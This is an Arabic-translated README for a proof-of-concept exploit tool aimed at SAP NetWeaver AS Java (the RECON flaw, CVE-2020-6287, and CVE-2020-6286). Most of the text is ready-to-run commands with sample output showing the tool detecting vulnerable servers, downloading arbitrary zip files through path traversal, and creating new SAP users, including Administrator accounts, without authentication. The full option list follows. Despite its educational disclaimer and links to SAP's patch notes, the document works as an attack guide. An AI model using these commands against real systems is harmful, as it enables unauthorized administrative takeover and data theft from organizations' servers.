
PoC لـ CVE-2020-6287 وCVE-2020-6286 (ثغرة SAP RECON)
بففف! RECON (Remotely Exploitable Code On NetWeaver)؟ يا رفاق، حقًا؟ هل كان هذا أفضل اسم رمزي توصلتم إليه؟ :)
يتيح هذا السكربت التحقق من ثغرة عدم التحقق من الصلاحية في SAP LM Configuration Wizard، كما أنه وبصفته سكربت PoC يستغل اجتياز المسار في دالة queryProtocol.
تسمح ثغرة اجتياز المسار بتنزيل أي ملف zip من خادم SAP.
هذا المشروع أُنشئ لأغراض تعليمية فقط ولا يمكن استخدامه لانتهاك القانون أو لتحقيق مكاسب شخصية.
مؤلف هذا المشروع غير مسؤول عن أي ضرر محتمل ناتج عن مواد هذا المشروع
الاكتشاف الأصلي:
CVE-2020-6287: Pablo Artuso
CVE-2020-6286: Yvan 'iggy' G.
فقط حدد اسم المضيف/عنوان IP لخادم SAP NW AS Java.
توجد خيارات إضافية:
-c - التحقق مما إذا كان خادم SAP عرضة لثغرة RECON-f - تنزيل ملف من خادم SAPzip-u - إنشاء مستخدم SAP JAVA بدور Authenticated User-a - إنشاء مستخدم SAP JAVA بدور Administratorمثال: تنزيل ملف zip
~python RECON.py -H 172.16.30.8 -f /1111.zip
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Ok! File zipfile_929.zip was saved
مثال: إنشاء مستخدم SAP JAVA
~python RECON.py -H 172.16.30.8 -u
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user. sapRpoc5484:Secure!PwD9379
Ok! User were created
مثال: إنشاء مستخدم SAP JAVA بدور Administrator
~python RECON.py -H 172.16.30.8 -a
Check1 - Vulnerable! [CVE-2020-6287] (RECON) - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user sapRpoc5574:Secure!PwD7715 with role 'Administrator'
Ok! Admin user were created
~python RECON.py -h
usage: RECON.py [-h] [-H HOST] [-P PORT] [-p PROXY] [-s] [-c] [-f ZIPFILE]
[-u] [-a] [--timeout TIMEOUT] [-v]
PoC for CVE-2020-6287, (RECON)
This scrip allows to check SAP LM Configuration Wizard missing authorization check vulnerability and exploits dir traversal in queryProtocol method
Original finding:
- Pablo Artuso. https://twitter.com/lmkalg
- Yvan 'iggy' G https://twitter.com/_1ggy
Thanks:
- Spencer McIntyre https://twitter.com/zeroSteiner
Solution: https://launchpad.support.sap.com/#/notes/2934135, https://launchpad.support.sap.com/#/notes/2939665
optional arguments:
-h, --help show this help message and exit
-H HOST, --host HOST Java NW host (default: 127.0.0.1)
-P PORT, --port PORT Java NW web port (default: tcp/50000)
-p PROXY, --proxy PROXY
Use proxy (ex: 127.0.0.1:8080)
-s, --ssl enable SSL
-c, --check just detect vulnerability
-f ZIPFILE, --zipfile ZIPFILE
ZIP file to read. CVE-2020-6286
-u, --user Create simple JAVA user. CVE-2020-6287
-a, --admin Create JAVA user with role "Administrator". CVE-2020-6287
--timeout TIMEOUT HTTP connection timeout in second (default: 10)
-v, --verbose verbose mode